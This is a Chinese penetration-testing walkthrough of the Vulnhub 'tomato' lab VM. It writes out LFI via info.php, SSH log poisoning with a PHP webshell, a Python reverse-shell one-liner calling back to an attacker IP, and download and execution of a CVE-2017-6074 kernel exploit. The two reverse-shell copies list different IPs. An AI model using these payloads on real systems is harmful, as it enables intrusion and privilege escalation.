信息收集
1.主机发现
收集80端口信息
没有收获后用dirb目录爆破
里面有很多目录,检查一下内容,在info.php中看到这是一个phpinfo的信息,查看源码得到一个注释:
这个注释提醒我们这里可能存在文件包含漏洞,image函数就是可以包含其他文件
验证成功
因为远程文件包含关闭,我们尝试进行本地文件包含
查看ssh默认的登录日志
view-source:http://192.168.110.137/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log成功回显说明日志是在默认目录的那我们就可以在ssh登录时利用用户名注入木马
注入命令执行小马到ssh登录日志
ssh '<?php system($_GET['cmd']);?>'@192.168.110.137 -p 2211
执行一个目录查看注入成功否
view-source:http://192.168.110.137/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=ls
验证是否存在python环境
view-source:http://192.168.110.137/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=which%20python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.137",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'进行url编码后写入url
http://192.168.110.137/antibot_image/antibots/info.php/?image=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3B%0As%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.66.129%22%2C4444))%3B%0Aos.dup2(s.fileno()%2C0)%3B%0Aos.dup2(s.fileno()%2C1)%3B%20%0Aos.dup2(s.fileno()%2C2)%3B%0Ap%3Dsubprocess.call([%22%2Fbin%2Fsh%22%2C%22-i%22])%3B%27本地用nc设置监听
nc -lvnp 4444收到反弹shell后查看内核发现4.4.0-21
在网上搜索发现时存在内核提权的对应提权脚本下载
git clone https://github.com/kkamagui/linux-kernel-exploits.git进入目录
cd/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074执行compile.sh后生成模块CVE-2017-6074
用python命令开启http将该模块下载到靶机
本地 python3 -m SimpleHTTPServer 8888
靶机http://192.168.66.129:8888/CVE-2017-6074(要进入/tmp目录下载)
给脚本执行权限chmod 750 CVE-2017-6074
执行脚本提权成功
原文始发于微信公众号(网络安全学习爱好者):Vulnhub靶机tomato渗透思路
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论